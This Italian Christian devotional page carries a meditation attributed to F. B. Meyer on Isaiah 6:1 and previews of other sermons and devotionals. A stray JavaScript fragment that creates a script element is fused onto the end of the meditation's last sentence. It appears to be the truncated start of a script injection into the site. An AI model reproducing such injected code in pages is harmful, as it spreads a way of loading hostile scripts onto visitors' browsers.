Meditazione del giorno: Il Signore esaltato

meyerfb

F. B. MEYER  –   “Nell’anno della morte del re Uzzia vidi il Signore seduto sopra un trono alto, molto elevato” (Isaia 6:1)

 –   Viviamo in tempi difficili e da sempre nella storia umana gli eventi esterni portano l’uomo a distrarsi e ad angosciarsi. Ma i servi di Dio vengono portati in un luogo segreto, il più alto, dove poter ammirare il nostro Dio che regna in eterno con giustizia e ordine. Il paese stava attraversando un periodo instabile di oscurità e angoscia che stavano portando ad un’imminente rivoluzione e proprio in questo periodo Isaia riuscì a ottenere la stabilità del trono di Dio.

“Molto elevato”, più alto di ogni altra autorità, potere o dominio in cielo, sulla terra e sotto la terra! Egli era coronato d’amore, “Sopra di Lui stavano i Serafini” e la parola Serafino deriva da fuoco ed i Serafini hanno la funzione di irradiare amore. Il trono è stato stabilito per portare solidità, giudizio e potere, sopra tutti questi attributi e sopra Dio regna sovrano l’Amore. Questa è la massima concezione possibile per i mortali, l’amore supremo. L’Agnello che fu immolato sta lì, sul Suo trono.

L’unico uomo in tutto Israele che ebbe l’opportunità di vedere Dio assiso sul Suo trono fu Isaia. In tutta umiltà salì al Tempio, in mezzo alla folla che invece era lì solo per una mera forma religiosa. Sembrava che ognuno di essi avesse bisogno di avere una visione rivelatrice più di lui, ma Isaia fu l’uomo che vide, che vide il Signore; fu l’unico uomo santo in tutto Israele che ebbe la grazia di avere un contatto diretto con Dio. Il resto degli Israeliti vide solo un Tempio, l’altare ed il rituale, ma Isaia vide i lembi del mantello che riempivano ogni angolo del luogo santo.

Non lasciamoci soddisfare dal ritualismo esteriore, dai sermoni, nonostante a volte siano magnifici! Coloro che sono umili e perseveranti nella ricerca di Dio riusciranno ad udire note che altri non possono udire, riusciranno a rilevare presenze che sfuggono agli sguardi ordinari, entreranno nel reame dello spirito che è chiuso per coloro che guardano solo all’esteriore.

Anche quando il mondo sia in tumulto, le maree si alzino, il Signore è potente: Egli è Colui che ha sconfitto la morte, che è risorto e asceso al cielo, Egli è il Signore dei signori, il Re dei re!var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

Charles Spurgeon: Predicare tra le avversità

di John Piper  –  Charles Haddon Spurgeon morì il 31 gennaio del 1892, all’età di 57 anni. Predicò per 38 anni al “Metropolitan Tabernacle” di Londra. La sua vita è ricchissima d’insegnamenti per i cristiani e specialmente per i pastori. Tutti dobbiamo affrontare le avversità e trovare in mezzo ad esse, il modo di perseverare anche nei momenti più opprimenti della vita. Tutti, allo stesso modo, devono alzarsi, fare …
Leggi Tutto

La libertà cristiana

di John MacArthur   – “Fratelli, voi siete stati chiamati a libertà; soltanto non fate della libertà un’occasione per vivere secondo la carne, ma per mezzo dell’amore servite gli uni agli altri”(Gal. 5:13).  Una delle mie gioie come pastore è quella di insegnare alle persone la Parola di Dio e spiegare le sue implicazioni nelle loro vite.  Tra i dubbi che la gente esprime, non figurano domande su se …
Leggi Tutto

ALLATTA IL BAMBINO E AVRAI IL TUO SALARIO

“Porta via questo bambino… allattalo, e io ti darò il tuo salario” (Esodo 2:9). Jokebed non si rendeva completamente conto del significato della sua fede quando affidava il suo piccolo al Signore, deponendolo dentro una cesta e nascondendolo nel canneto sulla riva del Nilo. Ella non pensava neppure che stava dando un bellissimo esempio a favore di milioni di bambini che, come Mosè, sarebbero stati usati da Dio …
Leggi Tutto

INSEGNARE A PREGARE

di E.M.Bounds –  Prima della Pentecoste gli Apostoli ed i discepoli di Gesù avevano solo un’idea generale circa la grande importanza della preghiera. Quando, però, vi fu la straordinaria manifestazione dello Spirito Santo, la preghiera fu elevata a quello stato di preminenza che tuttora occupa nella Chiesa cristiana. Oggi l’appello più urgente che lo Spirito Santo rivolge ai cristiani è come sempre l’appello alla preghiera. Infatti la crescita …
Leggi Tutto

CONSIGLI PER I NUOVI CREDENTI

di Reuben A. Torrey  –  Ora che hai iniziato la tua nuova vita ti troverai certamente di fronte a difficoltà che ti sono forse sconosciute. Forse hai già perso il coraggio ed hai incominciato a deviare. Nessuno deve vacillare perché Dio ha dichiarato nella Sua Parola: “Niuna tentazione vi ha colta che non sia stata umana; ora Dio è fedele e non permetterà che siate tentati al di …
Leggi Tutto

Una promessa per oggi: Io sono il Signore tuo Dio, che guarisce tutte le tue malattie

“Se tu ascolti attentamente la voce dell’Eterno, il tuo DIO, e fai ciò che è giusto ai suoi occhi e porgi orecchio ai suoi comandamenti e osservi tutte le sue leggi io non ti manderò addosso alcuna delle malattie che ho mandato addosso agli Egiziani perché io sono l’ Eterno che ti guarisco”. Esodo 15:26 Questa promessa Dio la pronuncia presso le acque di Mara, dove gli Israeliti …
Leggi Tutto

Crescita spirituale

di Agostino Masdea   –   “Colui che ha cominciato un’opera buona in voi, la porterà a compimento fino al giorno di Cristo Gesù”. (Filippesi 1:6) La Parola di Dio mette il credente davanti all’ineluttabile necessità di un costante cambiamento. Non solo un cambiamento iniziale, alla conversione, ma una trasformazione progressiva operata dallo Spirito Santo nella misura in cui il credente si arrende alla Sua opera.  A Nicodemo Gesù …
Leggi Tutto

Dai nostri Culti